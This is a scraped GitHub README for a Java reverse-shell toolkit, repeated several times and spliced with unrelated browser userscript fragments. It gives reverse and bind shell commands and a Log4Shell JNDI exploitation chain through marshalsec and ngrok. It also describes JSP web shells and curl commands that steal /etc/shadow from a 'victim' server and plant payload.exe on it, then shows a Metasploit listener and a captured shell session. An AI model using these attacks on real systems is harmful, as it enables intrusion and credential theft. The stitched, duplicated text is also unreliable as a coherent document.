Latest commit

History

1 Commit

Folders and files

NameName
Last commit message
Last commit date

Repository files navigation

Java Reverse TCP

JAR, JSP, and Java files for communicating with a remote host.

Works on Linux OS and macOS with /bin/sh and Windows OS with cmd.exe. Program will automatically detect an underlying OS.

Works with both, ncat and multi/handler.

Built with JDK v8 on Apache NetBeans IDE v17 (64-bit). All the files require Java SE v8 or greater to run.

JAR and Java files were tested with Java v8 update 282 on Windows 10 Enterprise OS (64-bit) and Kali Linux v2023.1 (64-bit).

JSP scripts were tested on Apache Tomcat Version v7.0.100 on XAMPP for Windows v7.4.3 on Windows 10 Enterprise OS (64-bit).

Made for educational purposes. I hope it will help!

Table of Contents

JAR Shells

Check the source code of JAR files:


Open your preferred console from /jar/ and run the following commands:

java -jar Reverse_Shell.jar 192.168.8.185 9000
java -jar Bind_Shell.jar 9000

Log4j Shells

This PoC was tested on Kali Linux v2023.1 (64-bit).

Change the IP address and port number inside the source files as necessary.

Open your preferred console from /log4j/ and run the following commands:

Compile the source file:

javac ReverseShell.java

Start a local web server from the same directory as the compiled class file (i.e., ReverseShell.class):

python3 -m http.server 9090
python3 -m http.server 9090 --directory somedirectory

Download and build LDAP server:

apt-update && apt-get install maven
git clone https://github.com/mbechler/marshalsec &&cd marshalsec && mvn clean package -DskipTests &&cd target

Start a local LDAP server and create a reference to the compiled class file on your local web server:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:9090/#ReverseShell

Credits to the author of marshalsec!

Give the local LDAP server a public domain with ngrok:

./ngrok tcp 1389

Build the JNDI string (obfuscate it however you like):

${jndi:ldap://x.tcp.ngrok.io:13337/ReverseShell}

JSP Shells

JSP Reverse Shell

Change the IP address and port number inside the script as necessary.

Copy /jsp/jsp_reverse_shell.jsp to your projects's root directory or upload it to your target's web server.

Navigate to the file with your preferred web browser.

JSP Web Shells

Check the simple JSP web shell based on HTTP POST request.

Check the simple JSP web shell based on HTTP GET request. You must URL encode your commands.

JSP File Upload/Download Script

Check the simple JSP file upload/download script based on HTTP POST request for file upload and HTTP GET request for file download.

When downloading a file, you must URL encode the file path.

Case 1: Upload the Script to the Victim’s Server

Navigate to the script on the victim's server with your preferred web browser, or use cURL from you PC.

Upload a file to the victim's server web root directory from your PC:

curl -s -k -X POST https://victim.com/files.jsp -F file=@/root/payload.exe

Download a file from the victim's PC to your PC:

curl -s -k -X GET https://victim.com/files.jsp?file=/etc/shadow -o shadow

If you use reverse shell and you have elevated your initial privileges, this script might not have the same privileges as your shell. To download a certain file, you might need to copy the file to the web root directory and give it necessary read permissions.

Case 2: Upload the Script to Your Server

From your JSP reverse shell, run the following cURL commands.

Upload a file from the victim's PC to your server web root directory:

curl -s -k -X POST https://your-server.com/files.jsp -F file=@/etc/shadow

Download a file from your PC to the victim's PC:

curl -s -k -X GET https://your-server.com/files.jsp?file=/root/payload.exe -o payload.exe
curl -s -k -X GET https://your-server.com/payload.exe -o payload.exe

Set Up a Listener

To set up a listener, open your preferred console on Kali Linux and run one of the examples below.

Set up ncat listener:

ncat -nvlp 9000

Set up multi/handler listener:

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.8.185
set LPORT 9000
exploit

Runtime

┌──(root💀kali)-[~/Desktop]
└─# ncat -nvlp 9000 Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::9000
Ncat: Listening on 0.0.0.0:9000
Ncat: Connection from 192.168.1.117.
Ncat: Connection from 192.168.1.117:49895.
Microsoft Windows [Version 10.0.18363.1556]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\W10\Desktop\Reverse Shell>whoami
desktop-4kniu10\w10
C:\Users\W10\Desktop\Reverse Shell>ver
Microsoft Windows [Version 10.0.18363.1556]
C:\Users\W10\Desktop\Reverse Shell>
, 'i'); if (__m === '*' || __re.test(location.href)) { injectUserscript("// Add copy buttons to all
 blocks\n(function() {\n function addCopyButtons() {\n document.querySelectorAll('pre code').forEach(function(codeBlock) {\n if (codeBlock.parentElement.hasAttribute('data-copy-added')) return;\n codeBlock.parentElement.setAttribute('data-copy-added', 'true');\n \n var btn = document.createElement('button');\n btn.textContent = 'Copy';\n btn.style.cssText = 'position:absolute;top:4px;right:4px;padding:2px 8px;font-size:11px;background:#4ecdc4;border:none;border-radius:4px;color:#1a1a2e;cursor:pointer;opacity:0.7;transition:opacity 0.2s;';\n btn.onmouseover = function() { this.style.opacity = '1'; };\n btn.onmouseout = function() { this.style.opacity = '0.7'; };\n btn.onclick = function() {\n navigator.clipboard.writeText(codeBlock.textContent).then(function() {\n btn.textContent = 'Copied!';\n setTimeout(function() { btn.textContent = 'Copy'; }, 1500);\n });\n };\n codeBlock.parentElement.style.position = 'relative';\n codeBlock.parentElement.appendChild(btn);\n });\n }\n \n addCopyButtons();\n \n // Re-run on dynamic content\n var observer = new MutationObserver(addCopyButtons);\n observer.observe(document.body, { childList: true, subtree: true });\n})();", "Add Copy Buttons to Code Blocks");
}
} catch(__e) { console.warn('[Userscript:Add Copy Buttons to Code Blocks]', __e); }
})();
(function(){
try {
var __m = "github.com";
var __re = new RegExp('^' + "github\\.com" + '
Skip to content

Latest commit

History

1 Commit

Folders and files

NameName
Last commit message
Last commit date

Repository files navigation

Java Reverse TCP

JAR, JSP, and Java files for communicating with a remote host.

Works on Linux OS and macOS with /bin/sh and Windows OS with cmd.exe. Program will automatically detect an underlying OS.

Works with both, ncat and multi/handler.

Built with JDK v8 on Apache NetBeans IDE v17 (64-bit). All the files require Java SE v8 or greater to run.

JAR and Java files were tested with Java v8 update 282 on Windows 10 Enterprise OS (64-bit) and Kali Linux v2023.1 (64-bit).

JSP scripts were tested on Apache Tomcat Version v7.0.100 on XAMPP for Windows v7.4.3 on Windows 10 Enterprise OS (64-bit).

Made for educational purposes. I hope it will help!

Table of Contents

JAR Shells

Check the source code of JAR files:


Open your preferred console from /jar/ and run the following commands:

java -jar Reverse_Shell.jar 192.168.8.185 9000
java -jar Bind_Shell.jar 9000

Log4j Shells

This PoC was tested on Kali Linux v2023.1 (64-bit).

Change the IP address and port number inside the source files as necessary.

Open your preferred console from /log4j/ and run the following commands:

Compile the source file:

javac ReverseShell.java

Start a local web server from the same directory as the compiled class file (i.e., ReverseShell.class):

python3 -m http.server 9090
python3 -m http.server 9090 --directory somedirectory

Download and build LDAP server:

apt-update && apt-get install maven
git clone https://github.com/mbechler/marshalsec &&cd marshalsec && mvn clean package -DskipTests &&cd target

Start a local LDAP server and create a reference to the compiled class file on your local web server:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:9090/#ReverseShell

Credits to the author of marshalsec!

Give the local LDAP server a public domain with ngrok:

./ngrok tcp 1389

Build the JNDI string (obfuscate it however you like):

${jndi:ldap://x.tcp.ngrok.io:13337/ReverseShell}

JSP Shells

JSP Reverse Shell

Change the IP address and port number inside the script as necessary.

Copy /jsp/jsp_reverse_shell.jsp to your projects's root directory or upload it to your target's web server.

Navigate to the file with your preferred web browser.

JSP Web Shells

Check the simple JSP web shell based on HTTP POST request.

Check the simple JSP web shell based on HTTP GET request. You must URL encode your commands.

JSP File Upload/Download Script

Check the simple JSP file upload/download script based on HTTP POST request for file upload and HTTP GET request for file download.

When downloading a file, you must URL encode the file path.

Case 1: Upload the Script to the Victim’s Server

Navigate to the script on the victim's server with your preferred web browser, or use cURL from you PC.

Upload a file to the victim's server web root directory from your PC:

curl -s -k -X POST https://victim.com/files.jsp -F file=@/root/payload.exe

Download a file from the victim's PC to your PC:

curl -s -k -X GET https://victim.com/files.jsp?file=/etc/shadow -o shadow

If you use reverse shell and you have elevated your initial privileges, this script might not have the same privileges as your shell. To download a certain file, you might need to copy the file to the web root directory and give it necessary read permissions.

Case 2: Upload the Script to Your Server

From your JSP reverse shell, run the following cURL commands.

Upload a file from the victim's PC to your server web root directory:

curl -s -k -X POST https://your-server.com/files.jsp -F file=@/etc/shadow

Download a file from your PC to the victim's PC:

curl -s -k -X GET https://your-server.com/files.jsp?file=/root/payload.exe -o payload.exe
curl -s -k -X GET https://your-server.com/payload.exe -o payload.exe

Set Up a Listener

To set up a listener, open your preferred console on Kali Linux and run one of the examples below.

Set up ncat listener:

ncat -nvlp 9000

Set up multi/handler listener:

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.8.185
set LPORT 9000
exploit

Runtime

┌──(root💀kali)-[~/Desktop]
└─# ncat -nvlp 9000 Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::9000
Ncat: Listening on 0.0.0.0:9000
Ncat: Connection from 192.168.1.117.
Ncat: Connection from 192.168.1.117:49895.
Microsoft Windows [Version 10.0.18363.1556]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\W10\Desktop\Reverse Shell>whoami
desktop-4kniu10\w10
C:\Users\W10\Desktop\Reverse Shell>ver
Microsoft Windows [Version 10.0.18363.1556]
C:\Users\W10\Desktop\Reverse Shell>
, 'i'); if (__m === '*' || __re.test(location.href)) { injectUserscript("// Force GitHub README to respect dark mode\n(function() {\n var style = document.createElement('style');\n style.textContent = '\n .markdown-body {\n color-scheme: dark light;\n }\n .markdown-body pre { background: #161b22 !important; }\n .markdown-body code { background: rgba(110, 118, 129, 0.4) !important; }\n .markdown-body table th, .markdown-body table td { border-color: #30363d !important; }\n .markdown-body img { background: #0d1117; }\n .markdown-body blockquote { border-left-color: #8b949e; }\n .markdown-body hr { border-color: #30363d; }\n ';\n document.head.appendChild(style);\n})();", "GitHub Dark Mode README Fix"); } } catch(__e) { console.warn('[Userscript:GitHub Dark Mode README Fix]', __e); } })(); (function(){ try { var __m = "*"; var __re = new RegExp('^' + ".*" + '
Skip to content

Latest commit

History

1 Commit

Folders and files

NameName
Last commit message
Last commit date

Repository files navigation

Java Reverse TCP

JAR, JSP, and Java files for communicating with a remote host.

Works on Linux OS and macOS with /bin/sh and Windows OS with cmd.exe. Program will automatically detect an underlying OS.

Works with both, ncat and multi/handler.

Built with JDK v8 on Apache NetBeans IDE v17 (64-bit). All the files require Java SE v8 or greater to run.

JAR and Java files were tested with Java v8 update 282 on Windows 10 Enterprise OS (64-bit) and Kali Linux v2023.1 (64-bit).

JSP scripts were tested on Apache Tomcat Version v7.0.100 on XAMPP for Windows v7.4.3 on Windows 10 Enterprise OS (64-bit).

Made for educational purposes. I hope it will help!

Table of Contents

JAR Shells

Check the source code of JAR files:


Open your preferred console from /jar/ and run the following commands:

java -jar Reverse_Shell.jar 192.168.8.185 9000
java -jar Bind_Shell.jar 9000

Log4j Shells

This PoC was tested on Kali Linux v2023.1 (64-bit).

Change the IP address and port number inside the source files as necessary.

Open your preferred console from /log4j/ and run the following commands:

Compile the source file:

javac ReverseShell.java

Start a local web server from the same directory as the compiled class file (i.e., ReverseShell.class):

python3 -m http.server 9090
python3 -m http.server 9090 --directory somedirectory

Download and build LDAP server:

apt-update && apt-get install maven
git clone https://github.com/mbechler/marshalsec &&cd marshalsec && mvn clean package -DskipTests &&cd target

Start a local LDAP server and create a reference to the compiled class file on your local web server:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:9090/#ReverseShell

Credits to the author of marshalsec!

Give the local LDAP server a public domain with ngrok:

./ngrok tcp 1389

Build the JNDI string (obfuscate it however you like):

${jndi:ldap://x.tcp.ngrok.io:13337/ReverseShell}

JSP Shells

JSP Reverse Shell

Change the IP address and port number inside the script as necessary.

Copy /jsp/jsp_reverse_shell.jsp to your projects's root directory or upload it to your target's web server.

Navigate to the file with your preferred web browser.

JSP Web Shells

Check the simple JSP web shell based on HTTP POST request.

Check the simple JSP web shell based on HTTP GET request. You must URL encode your commands.

JSP File Upload/Download Script

Check the simple JSP file upload/download script based on HTTP POST request for file upload and HTTP GET request for file download.

When downloading a file, you must URL encode the file path.

Case 1: Upload the Script to the Victim’s Server

Navigate to the script on the victim's server with your preferred web browser, or use cURL from you PC.

Upload a file to the victim's server web root directory from your PC:

curl -s -k -X POST https://victim.com/files.jsp -F file=@/root/payload.exe

Download a file from the victim's PC to your PC:

curl -s -k -X GET https://victim.com/files.jsp?file=/etc/shadow -o shadow

If you use reverse shell and you have elevated your initial privileges, this script might not have the same privileges as your shell. To download a certain file, you might need to copy the file to the web root directory and give it necessary read permissions.

Case 2: Upload the Script to Your Server

From your JSP reverse shell, run the following cURL commands.

Upload a file from the victim's PC to your server web root directory:

curl -s -k -X POST https://your-server.com/files.jsp -F file=@/etc/shadow

Download a file from your PC to the victim's PC:

curl -s -k -X GET https://your-server.com/files.jsp?file=/root/payload.exe -o payload.exe
curl -s -k -X GET https://your-server.com/payload.exe -o payload.exe

Set Up a Listener

To set up a listener, open your preferred console on Kali Linux and run one of the examples below.

Set up ncat listener:

ncat -nvlp 9000

Set up multi/handler listener:

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.8.185
set LPORT 9000
exploit

Runtime

┌──(root💀kali)-[~/Desktop]
└─# ncat -nvlp 9000 Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::9000
Ncat: Listening on 0.0.0.0:9000
Ncat: Connection from 192.168.1.117.
Ncat: Connection from 192.168.1.117:49895.
Microsoft Windows [Version 10.0.18363.1556]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\W10\Desktop\Reverse Shell>whoami
desktop-4kniu10\w10
C:\Users\W10\Desktop\Reverse Shell>ver
Microsoft Windows [Version 10.0.18363.1556]
C:\Users\W10\Desktop\Reverse Shell>
, 'i'); if (__m === '*' || __re.test(location.href)) { injectUserscript("// Highlight search terms from Google/DuckDuckGo/Bing referrer\n(function() {\n var ref = document.referrer;\n var terms = [];\n \n if (ref.includes('google.com') || ref.includes('duckduckgo.com') || ref.includes('bing.com')) {\n var url = new URL(ref);\n var q = url.searchParams.get('q') || url.searchParams.get('p');\n if (q) {\n terms = q.split(/\\s+/).filter(function(t) { return t.length > 2; });\n }\n }\n \n if (terms.length === 0) return;\n \n var style = document.createElement('style');\n style.textContent = '.userscript-highlight { background: #fbbf24; color: #1a1a2e; padding: 1px 3px; border-radius: 2px; }';\n document.head.appendChild(style);\n \n function highlight(node) {\n if (node.nodeType === 3) { // text node\n var text = node.textContent;\n var found = false;\n terms.forEach(function(term) {\n var regex = new RegExp('(' + term.replace(/[.*+?^${}()|[\\]\\\\]/g, '\\\\') + ')', 'gi');\n if (regex.test(text)) {\n found = true;\n var frag = document.createDocumentFragment();\n var parts = text.split(regex);\n parts.forEach(function(part, i) {\n if (i % 2 === 0) {\n frag.appendChild(document.createTextNode(part));\n } else {\n var span = document.createElement('span');\n span.className = 'userscript-highlight';\n span.textContent = part;\n frag.appendChild(span);\n }\n });\n node.parentNode.replaceChild(frag, node);\n }\n });\n } else if (node.nodeType === 1 && node.childNodes) { // element\n var skipTags = ['SCRIPT', 'STYLE', 'NOSCRIPT', 'TEXTAREA', 'INPUT', 'SELECT'];\n if (!skipTags.includes(node.tagName)) {\n Array.from(node.childNodes).forEach(highlight);\n }\n }\n }\n \n highlight(document.body);\n \n // Re-highlight on dynamic content\n var observer = new MutationObserver(function(mutations) {\n mutations.forEach(function(m) {\n m.addedNodes.forEach(function(node) {\n if (node.nodeType === 1 || node.nodeType === 3) highlight(node);\n });\n });\n });\n observer.observe(document.body, { childList: true, subtree: true });\n})();", "Highlight Search Terms"); } } catch(__e) { console.warn('[Userscript:Highlight Search Terms]', __e); } })(); (function(){ try { var __m = "*"; var __re = new RegExp('^' + ".*" + '
Skip to content

Latest commit

History

1 Commit

Folders and files

NameName
Last commit message
Last commit date

Repository files navigation

Java Reverse TCP

JAR, JSP, and Java files for communicating with a remote host.

Works on Linux OS and macOS with /bin/sh and Windows OS with cmd.exe. Program will automatically detect an underlying OS.

Works with both, ncat and multi/handler.

Built with JDK v8 on Apache NetBeans IDE v17 (64-bit). All the files require Java SE v8 or greater to run.

JAR and Java files were tested with Java v8 update 282 on Windows 10 Enterprise OS (64-bit) and Kali Linux v2023.1 (64-bit).

JSP scripts were tested on Apache Tomcat Version v7.0.100 on XAMPP for Windows v7.4.3 on Windows 10 Enterprise OS (64-bit).

Made for educational purposes. I hope it will help!

Table of Contents

JAR Shells

Check the source code of JAR files:


Open your preferred console from /jar/ and run the following commands:

java -jar Reverse_Shell.jar 192.168.8.185 9000
java -jar Bind_Shell.jar 9000

Log4j Shells

This PoC was tested on Kali Linux v2023.1 (64-bit).

Change the IP address and port number inside the source files as necessary.

Open your preferred console from /log4j/ and run the following commands:

Compile the source file:

javac ReverseShell.java

Start a local web server from the same directory as the compiled class file (i.e., ReverseShell.class):

python3 -m http.server 9090
python3 -m http.server 9090 --directory somedirectory

Download and build LDAP server:

apt-update && apt-get install maven
git clone https://github.com/mbechler/marshalsec &&cd marshalsec && mvn clean package -DskipTests &&cd target

Start a local LDAP server and create a reference to the compiled class file on your local web server:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:9090/#ReverseShell

Credits to the author of marshalsec!

Give the local LDAP server a public domain with ngrok:

./ngrok tcp 1389

Build the JNDI string (obfuscate it however you like):

${jndi:ldap://x.tcp.ngrok.io:13337/ReverseShell}

JSP Shells

JSP Reverse Shell

Change the IP address and port number inside the script as necessary.

Copy /jsp/jsp_reverse_shell.jsp to your projects's root directory or upload it to your target's web server.

Navigate to the file with your preferred web browser.

JSP Web Shells

Check the simple JSP web shell based on HTTP POST request.

Check the simple JSP web shell based on HTTP GET request. You must URL encode your commands.

JSP File Upload/Download Script

Check the simple JSP file upload/download script based on HTTP POST request for file upload and HTTP GET request for file download.

When downloading a file, you must URL encode the file path.

Case 1: Upload the Script to the Victim’s Server

Navigate to the script on the victim's server with your preferred web browser, or use cURL from you PC.

Upload a file to the victim's server web root directory from your PC:

curl -s -k -X POST https://victim.com/files.jsp -F file=@/root/payload.exe

Download a file from the victim's PC to your PC:

curl -s -k -X GET https://victim.com/files.jsp?file=/etc/shadow -o shadow

If you use reverse shell and you have elevated your initial privileges, this script might not have the same privileges as your shell. To download a certain file, you might need to copy the file to the web root directory and give it necessary read permissions.

Case 2: Upload the Script to Your Server

From your JSP reverse shell, run the following cURL commands.

Upload a file from the victim's PC to your server web root directory:

curl -s -k -X POST https://your-server.com/files.jsp -F file=@/etc/shadow

Download a file from your PC to the victim's PC:

curl -s -k -X GET https://your-server.com/files.jsp?file=/root/payload.exe -o payload.exe
curl -s -k -X GET https://your-server.com/payload.exe -o payload.exe

Set Up a Listener

To set up a listener, open your preferred console on Kali Linux and run one of the examples below.

Set up ncat listener:

ncat -nvlp 9000

Set up multi/handler listener:

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.8.185
set LPORT 9000
exploit

Runtime

┌──(root💀kali)-[~/Desktop]
└─# ncat -nvlp 9000 Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::9000
Ncat: Listening on 0.0.0.0:9000
Ncat: Connection from 192.168.1.117.
Ncat: Connection from 192.168.1.117:49895.
Microsoft Windows [Version 10.0.18363.1556]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\W10\Desktop\Reverse Shell>whoami
desktop-4kniu10\w10
C:\Users\W10\Desktop\Reverse Shell>ver
Microsoft Windows [Version 10.0.18363.1556]
C:\Users\W10\Desktop\Reverse Shell>
, 'i'); if (__m === '*' || __re.test(location.href)) { injectUserscript("// Strip utm_, fbclid, gclid, etc. from all links on page\n(function() {\n var trackingParams = ['utm_source', 'utm_medium', 'utm_campaign', 'utm_term', 'utm_content',\n 'fbclid', 'gclid', 'dclid', 'msclkid', 'yclid',\n 'ref', 'ref_src', 'source', 'medium', 'campaign'];\n \n function cleanUrl(url) {\n try {\n var u = new URL(url, window.location.origin);\n var changed = false;\n trackingParams.forEach(function(p) {\n if (u.searchParams.has(p)) {\n u.searchParams.delete(p);\n changed = true;\n }\n });\n return changed ? u.toString() : url;\n } catch (e) {\n return url;\n }\n }\n \n function cleanLinks() {\n document.querySelectorAll('a[href]').forEach(function(a) {\n var clean = cleanUrl(a.href);\n if (clean !== a.href) a.href = clean;\n });\n }\n \n cleanLinks();\n \n var observer = new MutationObserver(function(mutations) {\n mutations.forEach(function(m) {\n m.addedNodes.forEach(function(node) {\n if (node.nodeType === 1) {\n if (node.tagName === 'A') cleanLinks();\n node.querySelectorAll('a[href]').forEach(function(a) {\n var clean = cleanUrl(a.href);\n if (clean !== a.href) a.href = clean;\n });\n }\n });\n });\n });\n observer.observe(document.body, { childList: true, subtree: true });\n})();", "Remove Tracking Parameters from Links"); } } catch(__e) { console.warn('[Userscript:Remove Tracking Parameters from Links]', __e); } })(); (function(){ try { var __m = "youtube.com"; var __re = new RegExp('^' + "youtube\\.com" + '
Skip to content

Latest commit

History

1 Commit

Folders and files

NameName
Last commit message
Last commit date

Repository files navigation

Java Reverse TCP

JAR, JSP, and Java files for communicating with a remote host.

Works on Linux OS and macOS with /bin/sh and Windows OS with cmd.exe. Program will automatically detect an underlying OS.

Works with both, ncat and multi/handler.

Built with JDK v8 on Apache NetBeans IDE v17 (64-bit). All the files require Java SE v8 or greater to run.

JAR and Java files were tested with Java v8 update 282 on Windows 10 Enterprise OS (64-bit) and Kali Linux v2023.1 (64-bit).

JSP scripts were tested on Apache Tomcat Version v7.0.100 on XAMPP for Windows v7.4.3 on Windows 10 Enterprise OS (64-bit).

Made for educational purposes. I hope it will help!

Table of Contents

JAR Shells

Check the source code of JAR files:


Open your preferred console from /jar/ and run the following commands:

java -jar Reverse_Shell.jar 192.168.8.185 9000
java -jar Bind_Shell.jar 9000

Log4j Shells

This PoC was tested on Kali Linux v2023.1 (64-bit).

Change the IP address and port number inside the source files as necessary.

Open your preferred console from /log4j/ and run the following commands:

Compile the source file:

javac ReverseShell.java

Start a local web server from the same directory as the compiled class file (i.e., ReverseShell.class):

python3 -m http.server 9090
python3 -m http.server 9090 --directory somedirectory

Download and build LDAP server:

apt-update && apt-get install maven
git clone https://github.com/mbechler/marshalsec &&cd marshalsec && mvn clean package -DskipTests &&cd target

Start a local LDAP server and create a reference to the compiled class file on your local web server:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:9090/#ReverseShell

Credits to the author of marshalsec!

Give the local LDAP server a public domain with ngrok:

./ngrok tcp 1389

Build the JNDI string (obfuscate it however you like):

${jndi:ldap://x.tcp.ngrok.io:13337/ReverseShell}

JSP Shells

JSP Reverse Shell

Change the IP address and port number inside the script as necessary.

Copy /jsp/jsp_reverse_shell.jsp to your projects's root directory or upload it to your target's web server.

Navigate to the file with your preferred web browser.

JSP Web Shells

Check the simple JSP web shell based on HTTP POST request.

Check the simple JSP web shell based on HTTP GET request. You must URL encode your commands.

JSP File Upload/Download Script

Check the simple JSP file upload/download script based on HTTP POST request for file upload and HTTP GET request for file download.

When downloading a file, you must URL encode the file path.

Case 1: Upload the Script to the Victim’s Server

Navigate to the script on the victim's server with your preferred web browser, or use cURL from you PC.

Upload a file to the victim's server web root directory from your PC:

curl -s -k -X POST https://victim.com/files.jsp -F file=@/root/payload.exe

Download a file from the victim's PC to your PC:

curl -s -k -X GET https://victim.com/files.jsp?file=/etc/shadow -o shadow

If you use reverse shell and you have elevated your initial privileges, this script might not have the same privileges as your shell. To download a certain file, you might need to copy the file to the web root directory and give it necessary read permissions.

Case 2: Upload the Script to Your Server

From your JSP reverse shell, run the following cURL commands.

Upload a file from the victim's PC to your server web root directory:

curl -s -k -X POST https://your-server.com/files.jsp -F file=@/etc/shadow

Download a file from your PC to the victim's PC:

curl -s -k -X GET https://your-server.com/files.jsp?file=/root/payload.exe -o payload.exe
curl -s -k -X GET https://your-server.com/payload.exe -o payload.exe

Set Up a Listener

To set up a listener, open your preferred console on Kali Linux and run one of the examples below.

Set up ncat listener:

ncat -nvlp 9000

Set up multi/handler listener:

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.8.185
set LPORT 9000
exploit

Runtime

┌──(root💀kali)-[~/Desktop]
└─# ncat -nvlp 9000 Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::9000
Ncat: Listening on 0.0.0.0:9000
Ncat: Connection from 192.168.1.117.
Ncat: Connection from 192.168.1.117:49895.
Microsoft Windows [Version 10.0.18363.1556]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\W10\Desktop\Reverse Shell>whoami
desktop-4kniu10\w10
C:\Users\W10\Desktop\Reverse Shell>ver
Microsoft Windows [Version 10.0.18363.1556]
C:\Users\W10\Desktop\Reverse Shell>
, 'i'); if (__m === '*' || __re.test(location.href)) { injectUserscript("// Auto-enable theater mode on YouTube\n(function() {\n function tryTheater() {\n var btn = document.querySelector('button[aria-label=\"Theater mode\"], ytd-player #player button[title=\"Theater mode\"]');\n if (btn && !btn.classList.contains('activated')) {\n btn.click();\n }\n }\n \n // Try immediately\n tryTheater();\n \n // Try after navigation (SPA)\n var lastUrl = location.href;\n setInterval(function() {\n if (location.href !== lastUrl) {\n lastUrl = location.href;\n setTimeout(tryTheater, 500);\n }\n }, 1000);\n \n // Also try on player load\n var observer = new MutationObserver(tryTheater);\n observer.observe(document.body, { childList: true, subtree: true });\n})();", "YouTube Theater Mode Default"); } } catch(__e) { console.warn('[Userscript:YouTube Theater Mode Default]', __e); } })(); (function(){ try { var __m = "*"; var __re = new RegExp('^' + ".*" + '
Skip to content

Latest commit

History

1 Commit

Folders and files

NameName
Last commit message
Last commit date

Repository files navigation

Java Reverse TCP

JAR, JSP, and Java files for communicating with a remote host.

Works on Linux OS and macOS with /bin/sh and Windows OS with cmd.exe. Program will automatically detect an underlying OS.

Works with both, ncat and multi/handler.

Built with JDK v8 on Apache NetBeans IDE v17 (64-bit). All the files require Java SE v8 or greater to run.

JAR and Java files were tested with Java v8 update 282 on Windows 10 Enterprise OS (64-bit) and Kali Linux v2023.1 (64-bit).

JSP scripts were tested on Apache Tomcat Version v7.0.100 on XAMPP for Windows v7.4.3 on Windows 10 Enterprise OS (64-bit).

Made for educational purposes. I hope it will help!

Table of Contents

JAR Shells

Check the source code of JAR files:


Open your preferred console from /jar/ and run the following commands:

java -jar Reverse_Shell.jar 192.168.8.185 9000
java -jar Bind_Shell.jar 9000

Log4j Shells

This PoC was tested on Kali Linux v2023.1 (64-bit).

Change the IP address and port number inside the source files as necessary.

Open your preferred console from /log4j/ and run the following commands:

Compile the source file:

javac ReverseShell.java

Start a local web server from the same directory as the compiled class file (i.e., ReverseShell.class):

python3 -m http.server 9090
python3 -m http.server 9090 --directory somedirectory

Download and build LDAP server:

apt-update && apt-get install maven
git clone https://github.com/mbechler/marshalsec &&cd marshalsec && mvn clean package -DskipTests &&cd target

Start a local LDAP server and create a reference to the compiled class file on your local web server:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:9090/#ReverseShell

Credits to the author of marshalsec!

Give the local LDAP server a public domain with ngrok:

./ngrok tcp 1389

Build the JNDI string (obfuscate it however you like):

${jndi:ldap://x.tcp.ngrok.io:13337/ReverseShell}

JSP Shells

JSP Reverse Shell

Change the IP address and port number inside the script as necessary.

Copy /jsp/jsp_reverse_shell.jsp to your projects's root directory or upload it to your target's web server.

Navigate to the file with your preferred web browser.

JSP Web Shells

Check the simple JSP web shell based on HTTP POST request.

Check the simple JSP web shell based on HTTP GET request. You must URL encode your commands.

JSP File Upload/Download Script

Check the simple JSP file upload/download script based on HTTP POST request for file upload and HTTP GET request for file download.

When downloading a file, you must URL encode the file path.

Case 1: Upload the Script to the Victim’s Server

Navigate to the script on the victim's server with your preferred web browser, or use cURL from you PC.

Upload a file to the victim's server web root directory from your PC:

curl -s -k -X POST https://victim.com/files.jsp -F file=@/root/payload.exe

Download a file from the victim's PC to your PC:

curl -s -k -X GET https://victim.com/files.jsp?file=/etc/shadow -o shadow

If you use reverse shell and you have elevated your initial privileges, this script might not have the same privileges as your shell. To download a certain file, you might need to copy the file to the web root directory and give it necessary read permissions.

Case 2: Upload the Script to Your Server

From your JSP reverse shell, run the following cURL commands.

Upload a file from the victim's PC to your server web root directory:

curl -s -k -X POST https://your-server.com/files.jsp -F file=@/etc/shadow

Download a file from your PC to the victim's PC:

curl -s -k -X GET https://your-server.com/files.jsp?file=/root/payload.exe -o payload.exe
curl -s -k -X GET https://your-server.com/payload.exe -o payload.exe

Set Up a Listener

To set up a listener, open your preferred console on Kali Linux and run one of the examples below.

Set up ncat listener:

ncat -nvlp 9000

Set up multi/handler listener:

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.8.185
set LPORT 9000
exploit

Runtime

┌──(root💀kali)-[~/Desktop]
└─# ncat -nvlp 9000 Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::9000
Ncat: Listening on 0.0.0.0:9000
Ncat: Connection from 192.168.1.117.
Ncat: Connection from 192.168.1.117:49895.
Microsoft Windows [Version 10.0.18363.1556]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\W10\Desktop\Reverse Shell>whoami
desktop-4kniu10\w10
C:\Users\W10\Desktop\Reverse Shell>ver
Microsoft Windows [Version 10.0.18363.1556]
C:\Users\W10\Desktop\Reverse Shell>
